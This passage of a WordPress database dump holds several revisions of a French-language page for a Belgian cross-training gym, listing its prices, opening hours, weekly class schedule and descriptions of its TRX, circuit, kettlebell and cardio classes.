15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Les cours ?</h2>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:28:10', '2013-06-16 14:28:10', '', 11, 'http://www.crosstrainingcenter.be/?p=123', 0, 'revision', '', 0),
(219, 1, '2013-07-03 18:25:11', '2013-07-03 18:25:11', '<h2>Prix</h2>', 'Prix', '', 'inherit', 'open', 'open', '', '214-revision-2', '', '', '2013-07-03 18:25:11', '2013-07-03 18:25:11', '', 214, 'http://www.crosstrainingcenter.be/?p=219', 0, 'revision', '', 0),
(124, 1, '2013-06-16 14:33:05', '2013-06-16 14:33:05', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Les cours :</h2>\r\nEn semaine<br>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:33:05', '2013-06-16 14:33:05', '', 11, 'http://www.crosstrainingcenter.be/?p=124', 0, 'revision', '', 0),
(125, 1, '2013-06-16 14:34:31', '2013-06-16 14:34:31', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Les cours :</h2>\r\nEn semaine<br>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:34:31', '2013-06-16 14:34:31', '', 11, 'http://www.crosstrainingcenter.be/?p=125', 0, 'revision', '', 0),
(206, 1, '2013-07-03 18:02:08', '2013-07-03 18:02:08', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"><strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>\r\nDuo Training :</h2>\r\nUniquement sur rdv\r\n\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\n\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\n\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 18:02:08', '2013-07-03 18:02:08', '', 11, 'http://www.crosstrainingcenter.be/?p=206', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(205, 1, '2013-07-03 17:58:05', '2013-07-03 17:58:05', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\">\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n\r\n<br><br>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les 